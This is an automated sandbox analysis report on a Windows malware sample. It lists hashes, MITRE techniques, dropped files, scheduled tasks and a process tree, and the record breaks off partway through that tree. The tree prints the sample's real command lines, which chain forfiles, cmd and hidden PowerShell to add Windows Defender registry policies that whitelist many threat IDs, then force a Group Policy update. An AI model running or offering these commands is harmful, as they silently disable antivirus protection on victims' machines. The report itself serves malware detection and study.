44483ca13b239cd945275aa6aea3701bd6fc429b5f76a36819e726fdc377459c

Analysis

max time kernel
153s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
28/05/2024, 01:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
Size

6.6MB
MD5

bd741cae4a5955c610761f5d76c24a33
SHA1

84138e2a3a7383f3aa2374a2e73d7e406c65c6d0
SHA256

44483ca13b239cd945275aa6aea3701bd6fc429b5f76a36819e726fdc377459c
SHA512

04fdc372eb393d2515b3fe0a8ce1ae4556d73b1c9c0debba671173e8584ce7f1b5ce2604763704aedfa4fd13916c8ff5fbf153758baa7ecea55886f7a8b70366
SSDEEP

196608:lNZILIcmCamzQRRkXeIt063S0Piv2QPMm9awLSN0p:lNqIBCayQRANC0Piv2Qr9J

Score

8^/10

discovery execution spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1424	powershell.exe
4988	powershell.EXE

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnknkapchbklfgbfimfgcapmdnlkdajg\1.2_0\manifest.json	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\YdicROZXU\amFLffJ.xml	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\HyPszsbozHjU2\BDzwpYpzHEDRk.dll	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{EF7EF554-D23D-4BD5-A178-25C4A3726B49}.xpi	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR\hFAPIao.xml	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\sdIWsxsIljAmC\kdvVksb.xml	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR\khQdXVO.dll	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\sdIWsxsIljAmC\yQucROh.dll	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\czlHcasKUAUn\WFEsauw.dll	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\YdicROZXU\DwYzER.dll	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{EF7EF554-D23D-4BD5-A178-25C4A3726B49}.xpi	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
File created	C:\Program Files (x86)\HyPszsbozHjU2\ARvCxIX.xml	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\NZVNOJbpXMfOcZM.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2232	4844	WerFault.exe	90

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2804	schtasks.exe
4540	schtasks.exe
5000	schtasks.exe
2692	schtasks.exe
988	schtasks.exe
2860	schtasks.exe
4848	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1424	powershell.exe
2568	powershell.exe
1424	powershell.exe
2568	powershell.exe
2568	powershell.exe
1424	powershell.exe
4468	powershell.exe
4468	powershell.exe
4468	powershell.exe
4988	powershell.EXE
4988	powershell.EXE
4988	powershell.EXE
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	4988	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4844 wrote to memory of 5032	4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe	91
PID 4844 wrote to memory of 5032	4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe	91
PID 4844 wrote to memory of 5032	4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe	91
PID 5032 wrote to memory of 3656	5032	cmd.exe	93
PID 5032 wrote to memory of 3656	5032	cmd.exe	93
PID 5032 wrote to memory of 3656	5032	cmd.exe	93
PID 3656 wrote to memory of 2684	3656	forfiles.exe	94
PID 3656 wrote to memory of 2684	3656	forfiles.exe	94
PID 3656 wrote to memory of 2684	3656	forfiles.exe	94
PID 2684 wrote to memory of 4428	2684	cmd.exe	95
PID 2684 wrote to memory of 4428	2684	cmd.exe	95
PID 2684 wrote to memory of 4428	2684	cmd.exe	95
PID 5032 wrote to memory of 2460	5032	cmd.exe	96
PID 5032 wrote to memory of 2460	5032	cmd.exe	96
PID 5032 wrote to memory of 2460	5032	cmd.exe	96
PID 2460 wrote to memory of 2484	2460	forfiles.exe	97
PID 2460 wrote to memory of 2484	2460	forfiles.exe	97
PID 2460 wrote to memory of 2484	2460	forfiles.exe	97
PID 2484 wrote to memory of 5000	2484	cmd.exe	98
PID 2484 wrote to memory of 5000	2484	cmd.exe	98
PID 2484 wrote to memory of 5000	2484	cmd.exe	98
PID 5032 wrote to memory of 4892	5032	cmd.exe	99
PID 5032 wrote to memory of 4892	5032	cmd.exe	99
PID 5032 wrote to memory of 4892	5032	cmd.exe	99
PID 4892 wrote to memory of 2960	4892	forfiles.exe	100
PID 4892 wrote to memory of 2960	4892	forfiles.exe	100
PID 4892 wrote to memory of 2960	4892	forfiles.exe	100
PID 2960 wrote to memory of 3692	2960	cmd.exe	101
PID 2960 wrote to memory of 3692	2960	cmd.exe	101
PID 2960 wrote to memory of 3692	2960	cmd.exe	101
PID 5032 wrote to memory of 3176	5032	cmd.exe	102
PID 5032 wrote to memory of 3176	5032	cmd.exe	102
PID 5032 wrote to memory of 3176	5032	cmd.exe	102
PID 3176 wrote to memory of 228	3176	forfiles.exe	103
PID 3176 wrote to memory of 228	3176	forfiles.exe	103
PID 3176 wrote to memory of 228	3176	forfiles.exe	103
PID 228 wrote to memory of 564	228	cmd.exe	104
PID 228 wrote to memory of 564	228	cmd.exe	104
PID 228 wrote to memory of 564	228	cmd.exe	104
PID 5032 wrote to memory of 1772	5032	cmd.exe	105
PID 5032 wrote to memory of 1772	5032	cmd.exe	105
PID 5032 wrote to memory of 1772	5032	cmd.exe	105
PID 1772 wrote to memory of 3516	1772	forfiles.exe	106
PID 1772 wrote to memory of 3516	1772	forfiles.exe	106
PID 1772 wrote to memory of 3516	1772	forfiles.exe	106
PID 3516 wrote to memory of 1424	3516	cmd.exe	107
PID 3516 wrote to memory of 1424	3516	cmd.exe	107
PID 3516 wrote to memory of 1424	3516	cmd.exe	107
PID 4844 wrote to memory of 2568	4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe	108
PID 4844 wrote to memory of 2568	4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe	108
PID 4844 wrote to memory of 2568	4844	2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe	108
PID 2568 wrote to memory of 1736	2568	powershell.exe	114
PID 2568 wrote to memory of 1736	2568	powershell.exe	114
PID 2568 wrote to memory of 1736	2568	powershell.exe	114
PID 1736 wrote to memory of 4012	1736	cmd.exe	115
PID 1736 wrote to memory of 4012	1736	cmd.exe	115
PID 1736 wrote to memory of 4012	1736	cmd.exe	115
PID 2568 wrote to memory of 3640	2568	powershell.exe	116
PID 2568 wrote to memory of 3640	2568	powershell.exe	116
PID 2568 wrote to memory of 3640	2568	powershell.exe	116
PID 2568 wrote to memory of 4112	2568	powershell.exe	117
PID 2568 wrote to memory of 4112	2568	powershell.exe	117
PID 2568 wrote to memory of 4112	2568	powershell.exe	117
PID 2568 wrote to memory of 1876	2568	powershell.exe	118

C:\Users\Admin\AppData\Local\Temp\2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-28_bd741cae4a5955c610761f5d76c24a33_bkransomware.exe"
1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4844
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5032
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3656
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2684
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:4428
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2460
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2484
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5000
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4892
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2960
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:3692
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3176
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:228
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:564
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1772
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3516
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1424
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:3760
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2568
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1736
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:4012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3640
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4112
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3672
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:456
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2828
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:984
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3652
- - C:\Windows\SysWOW64\reg.exe
